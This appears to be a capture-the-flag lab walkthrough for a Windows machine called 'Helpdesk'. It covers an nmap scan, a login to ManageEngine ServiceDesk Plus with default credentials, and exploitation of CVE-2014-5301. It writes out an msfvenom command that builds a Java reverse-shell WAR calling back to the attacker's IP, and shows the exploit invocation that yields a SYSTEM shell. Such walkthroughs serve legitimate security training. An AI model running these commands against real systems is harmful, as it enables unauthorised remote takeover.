# Helpdesk

```
sudo nmap 192.168.214.43 -p- -sS -sV                                                                                                                                                                                             130 ⨯

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
```

Port 8080 root page lands us on a login page for ManageEngine ServiceDesk plus.

![http://192.168.214.43:8080/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a27b0f227dd82557df0cc9103fd5a03f594b0719%2Fimage.png?alt=media)

This is running version 7.6.0 as per the information available on screen. Looking up default credentials on Google shows we can try `administrator:admininistrator`. This proves successful and are able to login.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-00bc228d14b85fe622bdb6e250aa5bb4a24e0585%2Fimage.png?alt=media)

Research exploits for this particular version we come across **CVE-2014-5301**.

**Description:**

Directory traversal vulnerability in ServiceDesk Plus MSP v5 to v9.0 v9030; AssetExplorer v4 to v6.1; SupportCenter v5 to v7.9; IT360 v8 to v10.4.

Looking for available exploits we come to[: https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py](https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py)

As per the exploit instructions contained in the script generate a WAR file with `msfvenom`:

```
msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.214 LPORT=445 -f war > /home/kali/Desktop/shell.war
```

Then execute with the following syntax:

```
# Script usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE
 sudo python3 exploit.py 192.168.214.43 8080 administrator administrator shell.war
```

A shell should be received on a `netcat` listener running as SYSTEM.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8a83c57cc6eaf142f810f10be9bcebd0b0c74be9%2Fimage.png?alt=media)

{% hint style="info" %}
If you get a java heap error on the shell revert the machine and try again.
{% endhint %}